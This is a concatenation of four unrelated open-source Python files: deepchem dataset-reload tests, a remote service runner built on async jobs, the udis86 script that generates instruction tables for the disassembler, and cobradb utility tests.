"""Check num samples for loaded and reloaded datasets is equal."""
reload = False
current_dir = os.path.dirname(os.path.abspath(__file__))
dataset_file = os.path.join(current_dir,
"../../../datasets/mini_muv.csv.gz")
logger.info("Running experiment for first time without reload.")
(len_train, len_valid, len_test) = self._run_muv_experiment(
dataset_file, reload)
logger.info("Running experiment for second time with reload.")
reload = True
(len_reload_train, len_reload_valid,
len_reload_test) = (self._run_muv_experiment(dataset_file, reload))
assert len_train == len_reload_train
assert len_valid == len_reload_valid
    assert len_test == len_reload_test
def test_reload_twice(self):
"""Check ability to repeatedly run experiments with reload set True."""
reload = True
current_dir = os.path.dirname(os.path.abspath(__file__))
dataset_file = os.path.join(current_dir,
"../../../datasets/mini_muv.csv.gz")
logger.info("Running experiment for first time with reload.")
(len_train, len_valid, len_test) = self._run_muv_experiment(
dataset_file, reload)
logger.info("Running experiment for second time with reload.")
(len_reload_train, len_reload_valid,
len_reload_test) = (self._run_muv_experiment(dataset_file, reload))
assert len_train == len_reload_train
assert len_valid == len_reload_valid
    assert len_test == len_reload_test
|
ktaneishi/deepchem
|
deepchem/data/tests/test_reload.py
|
Python
|
mit
| 4,125
|
# (c) 2016, Hao Feng <whisperaven@gmail.com>
import logging
from .jobs import Job
from ._async import AsyncRunner
from .context import Context
from exe.executor.utils import *
from exe.utils.err import excinst
from exe.exc import ExecutorPrepareError, ExecutorNoMatchError
LOG = logging.getLogger(__name__)
class ServiceRunner(Context):
""" Manipulate service on remote host. """
__RUNNER_NAME__ = "service"
__RUNNER_MUTEX_REQUIRED__ = False
def handle(ctx, targets, name, start, restart, graceful, run_async=False):
""" Handle remote service maintain request. """
if not run_async:
return next(
ctx.executor(targets).service(name, start, restart, graceful),
None)
job = Job(targets, ctx.runner_name, ctx.runner_mutex,
dict(name=name, start=start,
restart=restart, graceful=graceful))
job.create(ctx.redis)
return job.associate_task(
_async_service.delay(job.dict_ctx, targets,
name, start, restart, graceful), ctx.redis)
@AsyncRunner.task(bind=True, ignore_result=True,
base=Context, serializer='json')
def _async_service(ctx, job_ctx, targets, name, start, restart, graceful):
job = Job.load(job_ctx)
job.bind(ctx.request.id)
try:
redis = _async_service.redis
executor = _async_service.executor(targets)
failed_targets = []
for yield_data in executor.service(name, start, restart, graceful):
target, context = decompose_exec_yielddata(yield_data)
            # service yields:
            #   {$host -> {EXE_STATUS_ATTR -> $state (int)}}
            # just push each context to redis
job.push_return_data(target, context, redis)
failed = execstate_failure(extract_return_state(context))
if failed:
failed_targets.append(target)
job.target_done(target, failed, redis)
msg = None
if failed_targets:
msg = "<{0}> of <{1}> remote host(s) got service errors".format(
len(failed_targets), len(targets))
job.done(bool(failed_targets), msg, redis)
except (ExecutorPrepareError, ExecutorNoMatchError):
msg = ("got executor error while invoke service tool, "
"{0}").format(excinst())
LOG.error(msg)
job.done(failed=True, errmsg=msg, redis=redis)
except:
msg = ("got unexpected error while invoke service tool, "
"{0}").format(excinst())
LOG.error(msg)
job.done(failed=True, errmsg=msg, redis=redis)
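# Illustration (assumed shape, following the comment inside the loop above):
# each yield from executor.service() decomposes into a target host and its
# per-host context keyed by EXE_STATUS_ATTR, e.g.
#
#   target  = "web01.example.com"       # hypothetical host
#   context = {EXE_STATUS_ATTR: state}  # $state (int), classified by
#                                       # execstate_failure()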
|
whisperaven/0ops.exed
|
exe/runner/service.py
|
Python
|
mit
| 2,674
|
# udis86 - scripts/ud_itab.py
#
# Copyright (c) 2009, 2013 Vivek Thampi
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import sys
from ud_opcode import UdOpcodeTable, UdOpcodeTables, UdInsnDef
class UdItabGenerator:
OperandDict = {
"Av" : [ "OP_A" , "SZ_V" ],
"E" : [ "OP_E" , "SZ_NA" ],
"Eb" : [ "OP_E" , "SZ_B" ],
"Ew" : [ "OP_E" , "SZ_W" ],
"Ev" : [ "OP_E" , "SZ_V" ],
"Ed" : [ "OP_E" , "SZ_D" ],
"Ey" : [ "OP_E" , "SZ_Y" ],
"Eq" : [ "OP_E" , "SZ_Q" ],
"Ez" : [ "OP_E" , "SZ_Z" ],
"Fv" : [ "OP_F" , "SZ_V" ],
"G" : [ "OP_G" , "SZ_NA" ],
"Gb" : [ "OP_G" , "SZ_B" ],
"Gw" : [ "OP_G" , "SZ_W" ],
"Gv" : [ "OP_G" , "SZ_V" ],
"Gy" : [ "OP_G" , "SZ_Y" ],
"Gd" : [ "OP_G" , "SZ_D" ],
"Gq" : [ "OP_G" , "SZ_Q" ],
"Gz" : [ "OP_G" , "SZ_Z" ],
"M" : [ "OP_M" , "SZ_NA" ],
"Mb" : [ "OP_M" , "SZ_B" ],
"Mw" : [ "OP_M" , "SZ_W" ],
"Ms" : [ "OP_M" , "SZ_W" ],
"Md" : [ "OP_M" , "SZ_D" ],
"Mq" : [ "OP_M" , "SZ_Q" ],
"Mdq" : [ "OP_M" , "SZ_DQ" ],
"Mv" : [ "OP_M" , "SZ_V" ],
"Mt" : [ "OP_M" , "SZ_T" ],
"Mo" : [ "OP_M" , "SZ_O" ],
"MbRd" : [ "OP_MR" , "SZ_BD" ],
"MbRv" : [ "OP_MR" , "SZ_BV" ],
"MwRv" : [ "OP_MR" , "SZ_WV" ],
"MwRd" : [ "OP_MR" , "SZ_WD" ],
"MwRy" : [ "OP_MR" , "SZ_WY" ],
"MdRy" : [ "OP_MR" , "SZ_DY" ],
"I1" : [ "OP_I1" , "SZ_NA" ],
"I3" : [ "OP_I3" , "SZ_NA" ],
"Ib" : [ "OP_I" , "SZ_B" ],
"Iw" : [ "OP_I" , "SZ_W" ],
"Iv" : [ "OP_I" , "SZ_V" ],
"Iz" : [ "OP_I" , "SZ_Z" ],
"sIb" : [ "OP_sI" , "SZ_B" ],
"sIz" : [ "OP_sI" , "SZ_Z" ],
"sIv" : [ "OP_sI" , "SZ_V" ],
"Jv" : [ "OP_J" , "SZ_V" ],
"Jz" : [ "OP_J" , "SZ_Z" ],
"Jb" : [ "OP_J" , "SZ_B" ],
"R" : [ "OP_R" , "SZ_RDQ" ],
"C" : [ "OP_C" , "SZ_NA" ],
"D" : [ "OP_D" , "SZ_NA" ],
"S" : [ "OP_S" , "SZ_W" ],
"Ob" : [ "OP_O" , "SZ_B" ],
"Ow" : [ "OP_O" , "SZ_W" ],
"Ov" : [ "OP_O" , "SZ_V" ],
"U" : [ "OP_U" , "SZ_O" ],
"Ux" : [ "OP_U" , "SZ_X" ],
"V" : [ "OP_V" , "SZ_DQ" ],
"Vdq" : [ "OP_V" , "SZ_DQ" ],
"Vqq" : [ "OP_V" , "SZ_QQ" ],
"Vsd" : [ "OP_V" , "SZ_Q" ],
"Vx" : [ "OP_V" , "SZ_X" ],
"H" : [ "OP_H" , "SZ_X" ],
"Hx" : [ "OP_H" , "SZ_X" ],
"Hqq" : [ "OP_H" , "SZ_QQ" ],
"W" : [ "OP_W" , "SZ_DQ" ],
"Wdq" : [ "OP_W" , "SZ_DQ" ],
"Wqq" : [ "OP_W" , "SZ_QQ" ],
"Wsd" : [ "OP_W" , "SZ_Q" ],
"Wx" : [ "OP_W" , "SZ_X" ],
"L" : [ "OP_L" , "SZ_O" ],
"Lx" : [ "OP_L" , "SZ_X" ],
"MwU" : [ "OP_MU" , "SZ_WO" ],
"MdU" : [ "OP_MU" , "SZ_DO" ],
"MqU" : [ "OP_MU" , "SZ_QO" ],
"N" : [ "OP_N" , "SZ_Q" ],
"P" : [ "OP_P" , "SZ_Q" ],
"Q" : [ "OP_Q" , "SZ_Q" ],
"AL" : [ "OP_AL" , "SZ_B" ],
"AX" : [ "OP_AX" , "SZ_W" ],
"eAX" : [ "OP_eAX" , "SZ_Z" ],
"rAX" : [ "OP_rAX" , "SZ_V" ],
"CL" : [ "OP_CL" , "SZ_B" ],
"CX" : [ "OP_CX" , "SZ_W" ],
"eCX" : [ "OP_eCX" , "SZ_Z" ],
"rCX" : [ "OP_rCX" , "SZ_V" ],
"DL" : [ "OP_DL" , "SZ_B" ],
"DX" : [ "OP_DX" , "SZ_W" ],
"eDX" : [ "OP_eDX" , "SZ_Z" ],
"rDX" : [ "OP_rDX" , "SZ_V" ],
"R0b" : [ "OP_R0" , "SZ_B" ],
"R1b" : [ "OP_R1" , "SZ_B" ],
"R2b" : [ "OP_R2" , "SZ_B" ],
"R3b" : [ "OP_R3" , "SZ_B" ],
"R4b" : [ "OP_R4" , "SZ_B" ],
"R5b" : [ "OP_R5" , "SZ_B" ],
"R6b" : [ "OP_R6" , "SZ_B" ],
"R7b" : [ "OP_R7" , "SZ_B" ],
"R0w" : [ "OP_R0" , "SZ_W" ],
"R1w" : [ "OP_R1" , "SZ_W" ],
"R2w" : [ "OP_R2" , "SZ_W" ],
"R3w" : [ "OP_R3" , "SZ_W" ],
"R4w" : [ "OP_R4" , "SZ_W" ],
"R5w" : [ "OP_R5" , "SZ_W" ],
"R6w" : [ "OP_R6" , "SZ_W" ],
"R7w" : [ "OP_R7" , "SZ_W" ],
"R0v" : [ "OP_R0" , "SZ_V" ],
"R1v" : [ "OP_R1" , "SZ_V" ],
"R2v" : [ "OP_R2" , "SZ_V" ],
"R3v" : [ "OP_R3" , "SZ_V" ],
"R4v" : [ "OP_R4" , "SZ_V" ],
"R5v" : [ "OP_R5" , "SZ_V" ],
"R6v" : [ "OP_R6" , "SZ_V" ],
"R7v" : [ "OP_R7" , "SZ_V" ],
"R0z" : [ "OP_R0" , "SZ_Z" ],
"R1z" : [ "OP_R1" , "SZ_Z" ],
"R2z" : [ "OP_R2" , "SZ_Z" ],
"R3z" : [ "OP_R3" , "SZ_Z" ],
"R4z" : [ "OP_R4" , "SZ_Z" ],
"R5z" : [ "OP_R5" , "SZ_Z" ],
"R6z" : [ "OP_R6" , "SZ_Z" ],
"R7z" : [ "OP_R7" , "SZ_Z" ],
"R0y" : [ "OP_R0" , "SZ_Y" ],
"R1y" : [ "OP_R1" , "SZ_Y" ],
"R2y" : [ "OP_R2" , "SZ_Y" ],
"R3y" : [ "OP_R3" , "SZ_Y" ],
"R4y" : [ "OP_R4" , "SZ_Y" ],
"R5y" : [ "OP_R5" , "SZ_Y" ],
"R6y" : [ "OP_R6" , "SZ_Y" ],
"R7y" : [ "OP_R7" , "SZ_Y" ],
"ES" : [ "OP_ES" , "SZ_NA" ],
"CS" : [ "OP_CS" , "SZ_NA" ],
"DS" : [ "OP_DS" , "SZ_NA" ],
"SS" : [ "OP_SS" , "SZ_NA" ],
"GS" : [ "OP_GS" , "SZ_NA" ],
"FS" : [ "OP_FS" , "SZ_NA" ],
"ST0" : [ "OP_ST0" , "SZ_NA" ],
"ST1" : [ "OP_ST1" , "SZ_NA" ],
"ST2" : [ "OP_ST2" , "SZ_NA" ],
"ST3" : [ "OP_ST3" , "SZ_NA" ],
"ST4" : [ "OP_ST4" , "SZ_NA" ],
"ST5" : [ "OP_ST5" , "SZ_NA" ],
"ST6" : [ "OP_ST6" , "SZ_NA" ],
"ST7" : [ "OP_ST7" , "SZ_NA" ],
"NONE" : [ "OP_NONE" , "SZ_NA" ],
}
#
# opcode prefix dictionary
#
PrefixDict = {
"rep" : "P_str",
"repz" : "P_strz",
"aso" : "P_aso",
"oso" : "P_oso",
"rexw" : "P_rexw",
"rexb" : "P_rexb",
"rexx" : "P_rexx",
"rexr" : "P_rexr",
"vexl" : "P_vexl",
"vexw" : "P_vexw",
"seg" : "P_seg",
"inv64" : "P_inv64",
"def64" : "P_def64",
"cast" : "P_cast",
}
MnemonicAliases = ( "invalid", "3dnow", "none", "db", "pause" )
def __init__(self, tables):
self.tables = tables
self._insnIndexMap, i = {}, 0
for insn in tables.getInsnList():
self._insnIndexMap[insn], i = i, i + 1
self._tableIndexMap, i = {}, 0
for table in tables.getTableList():
self._tableIndexMap[table], i = i, i + 1
def getInsnIndex(self, insn):
assert isinstance(insn, UdInsnDef)
return self._insnIndexMap[insn]
def getTableIndex(self, table):
assert isinstance(table, UdOpcodeTable)
return self._tableIndexMap[table]
def getTableName(self, table):
return "ud_itab__%d" % self.getTableIndex(table)
def genOpcodeTable(self, table, isGlobal=False):
"""Emit Opcode Table in C.
"""
self.ItabC.write( "\n" );
if not isGlobal:
self.ItabC.write('static ')
self.ItabC.write( "const uint16_t %s[] = {\n" % self.getTableName(table))
for i in range(table.size()):
if i > 0 and i % 4 == 0:
self.ItabC.write( "\n" )
if i % 4 == 0:
self.ItabC.write( " /* %2x */" % i)
e = table.entryAt(i)
if e is None:
self.ItabC.write("%12s," % "INVALID")
elif isinstance(e, UdOpcodeTable):
self.ItabC.write("%12s," % ("GROUP(%d)" % self.getTableIndex(e)))
elif isinstance(e, UdInsnDef):
self.ItabC.write("%12s," % self.getInsnIndex(e))
self.ItabC.write( "\n" )
self.ItabC.write( "};\n" )
def genOpcodeTables(self):
tables = self.tables.getTableList()
for table in tables:
self.genOpcodeTable(table, table is self.tables.root)
def genOpcodeTablesLookupIndex(self):
self.ItabC.write( "\n\n" );
self.ItabC.write( "struct ud_lookup_table_list_entry ud_lookup_table_list[] = {\n" )
for table in self.tables.getTableList():
f0 = self.getTableName(table) + ","
f1 = table.label() + ","
f2 = "\"%s\"" % table.meta()
self.ItabC.write(" /* %03d */ { %s %s %s },\n" %
(self.getTableIndex(table), f0, f1, f2))
self.ItabC.write( "};" )
def genInsnTable( self ):
self.ItabC.write( "struct ud_itab_entry ud_itab[] = {\n" );
for insn in self.tables.getInsnList():
opr_c = [ "O_NONE", "O_NONE", "O_NONE", "O_NONE" ]
pfx_c = []
opr = insn.operands
for i in range(len(opr)):
if not (opr[i] in self.OperandDict.keys()):
print("error: invalid operand declaration: %s\n" % opr[i])
opr_c[i] = "O_" + opr[i]
opr = "%s %s %s %s" % (opr_c[0] + ",", opr_c[1] + ",",
opr_c[2] + ",", opr_c[3])
for p in insn.prefixes:
if not ( p in self.PrefixDict.keys() ):
print("error: invalid prefix specification: %s \n" % pfx)
pfx_c.append( self.PrefixDict[p] )
if len(insn.prefixes) == 0:
pfx_c.append( "P_none" )
pfx = "|".join( pfx_c )
self.ItabC.write( " /* %04d */ { UD_I%s %s, %s },\n" \
% ( self.getInsnIndex(insn), insn.mnemonic + ',', opr, pfx ) )
self.ItabC.write( "};\n" )
def getMnemonicsList(self):
mnemonics = self.tables.getMnemonicsList()
mnemonics.extend(self.MnemonicAliases)
return mnemonics
def genMnemonicsList(self):
mnemonics = self.getMnemonicsList()
self.ItabC.write( "\n\n" );
self.ItabC.write( "const char* ud_mnemonics_str[] = {\n " )
self.ItabC.write( ",\n ".join( [ "\"%s\"" % m for m in mnemonics ] ) )
self.ItabC.write( "\n};\n" )
def genItabH( self, filePath ):
self.ItabH = open( filePath, "w" )
# Generate Table Type Enumeration
self.ItabH.write( "#ifndef UD_ITAB_H\n" )
self.ItabH.write( "#define UD_ITAB_H\n\n" )
self.ItabH.write("/* itab.h -- generated by udis86:scripts/ud_itab.py, do no edit */\n\n")
# table type enumeration
self.ItabH.write( "/* ud_table_type -- lookup table types (see decode.c) */\n" )
self.ItabH.write( "enum ud_table_type {\n " )
enum = UdOpcodeTable.getLabels()
self.ItabH.write( ",\n ".join( enum ) )
self.ItabH.write( "\n};\n\n" );
# mnemonic enumeration
self.ItabH.write( "/* ud_mnemonic -- mnemonic constants */\n" )
enum = "enum ud_mnemonic_code {\n "
enum += ",\n ".join( [ "UD_I%s" % m for m in self.getMnemonicsList() ] )
enum += ",\n UD_MAX_MNEMONIC_CODE"
enum += "\n} UD_ATTR_PACKED;\n"
self.ItabH.write( enum )
self.ItabH.write( "\n" )
self.ItabH.write( "extern const char * ud_mnemonics_str[];\n" )
self.ItabH.write( "\n#endif /* UD_ITAB_H */\n" )
self.ItabH.close()
def genItabC(self, filePath):
self.ItabC = open(filePath, "w")
self.ItabC.write("/* itab.c -- generated by udis86:scripts/ud_itab.py, do no edit")
self.ItabC.write(" */\n");
self.ItabC.write("#include \"decode.h\"\n\n");
self.ItabC.write("#define GROUP(n) (0x8000 | (n))\n")
self.ItabC.write("#define INVALID %d\n\n" % self.getInsnIndex(self.tables.invalidInsn))
self.genOpcodeTables()
self.genOpcodeTablesLookupIndex()
#
# Macros defining short-names for operands
#
self.ItabC.write("\n\n/* itab entry operand definitions (for readability) */\n");
operands = self.OperandDict.keys()
operands = sorted(operands)
for o in operands:
self.ItabC.write("#define O_%-7s { %-12s %-8s }\n" %
(o, self.OperandDict[o][0] + ",", self.OperandDict[o][1]));
self.ItabC.write("\n");
self.genInsnTable()
self.genMnemonicsList()
self.ItabC.close()
def genItab( self, location ):
self.genItabC(os.path.join(location, "itab.c"))
self.genItabH(os.path.join(location, "itab.h"))
def usage():
print("usage: ud_itab.py <optable.xml> <output-path>")
def main():
if len(sys.argv) != 3:
usage()
sys.exit(1)
tables = UdOpcodeTables(xml=sys.argv[1])
itab = UdItabGenerator(tables)
itab.genItab(sys.argv[2])
if __name__ == '__main__':
main()
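# Shape of the generated output, derived from genItabH() above (the mnemonic
# name is a placeholder, not real table contents):
#
#   $ python ud_itab.py optable.xml build/
#
#   /* build/itab.h then contains, among other things: */
#   enum ud_mnemonic_code {
#       UD_Iaaa,
#       ...
#       UD_MAX_MNEMONIC_CODE
#   } UD_ATTR_PACKED;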
|
lvous/hadesmem
|
src/udis86/udis86/scripts/ud_itab.py
|
Python
|
mit
| 16,682
|
# -*- coding: utf-8 -*-
from cobradb.models import *
from cobradb.util import *
from cobradb.util import _find_data_source_url
import pytest
def test_increment_id():
assert increment_id('ACALD_1') == 'ACALD_2'
assert increment_id('ACALD_1a') == 'ACALD_1a_1'
assert increment_id('ACALD') == 'ACALD_1'
assert increment_id('ACALD_9') == 'ACALD_10'
assert increment_id('ACALD_10') == 'ACALD_11'
def test_make_reaction_copy_id():
assert make_reaction_copy_id('ACALD', 3) == 'ACALD_copy3'
def test_check_pseudoreaction():
assert check_pseudoreaction('ATPM') is True
assert check_pseudoreaction('ATPM1') is False
assert check_pseudoreaction('EX_glc_e') is True
assert check_pseudoreaction('aEX_glc_e') is False
assert check_pseudoreaction('SK_glc_e') is True
assert check_pseudoreaction('BIOMASS_objective') is True
assert check_pseudoreaction('BiomassEcoli') is False
assert check_pseudoreaction('DM_8') is True
def test__find_data_source_url():
url_prefs = [['kegg.compound', 'KEGG Compound', 'http://identifiers.org/kegg.compound/']]
assert _find_data_source_url('kegg.compound', url_prefs) == ('kegg.compound', 'KEGG Compound', 'http://identifiers.org/kegg.compound/')
def test__find_data_source_url_no_url():
url_prefs = [['kegg.compound', 'KEGG Compound']]
assert _find_data_source_url('kegg.compound', url_prefs) == ('kegg.compound', 'KEGG Compound', None)
def test__find_data_source_url_synonym():
url_prefs = [['kegg.compound', 'KEGG Compound', '', 'KEGGID,KEGG_ID']]
assert _find_data_source_url('KEGGID', url_prefs) == ('kegg.compound', 'KEGG Compound', None)
assert _find_data_source_url('KEGG_ID', url_prefs) == ('kegg.compound', 'KEGG Compound', None)
def test_get_or_create_data_source(test_db, session, tmpdir):
prefsfile = str(tmpdir.join('data_source_preferences.txt'))
with open(prefsfile, 'w') as f:
f.write('my_data_source\tname\tmy_url_prefix')
settings.data_source_preferences = prefsfile
get_or_create_data_source(session, 'my_data_source')
assert (session
.query(DataSource)
.filter(DataSource.bigg_id == 'my_data_source')
.filter(DataSource.name == 'name')
.filter(DataSource.url_prefix == 'my_url_prefix')
.count()) == 1
def test_format_formula():
assert format_formula("['abc']") == 'abc'
def test_scrub_gene_id():
assert scrub_gene_id('1234.5') == '1234_AT5'
assert scrub_gene_id('1234.56') == '1234_AT56'
assert scrub_gene_id('1234.56a') == '1234_56a'
assert scrub_gene_id('asdkf@#%*(@#$sadf') == 'asdkf________sadf'
def test_scrub_name():
assert scrub_name('retpalm_SPACE_deleted_SPACE_10_09_2005_SPACE_SPACE_06_COLON_18_COLON_49_SPACE_PM') == 'Retpalm deleted 10 09 2005 06:18:49 PM'
assert scrub_name('R_ammonia_reversible_transport') == 'Ammonia reversible transport'
assert scrub_name('_ammonia_reversible_transport') == 'Ammonia reversible transport'
assert scrub_name(None) == None
assert scrub_name('_ ') == None
def test_load_tsv(tmpdir):
# test file
a_file = tmpdir.join('temp.txt')
a_file.write('# ignore\tignore\na\ttest \n\n')
# run the test
rows = load_tsv(str(a_file))
assert rows == [['a', 'test']]
# with required_column_num
rows = load_tsv(str(a_file), required_column_num=3)
assert rows == []
|
SBRG/ome
|
cobradb/tests/test_util.py
|
Python
|
mit
| 3,409
|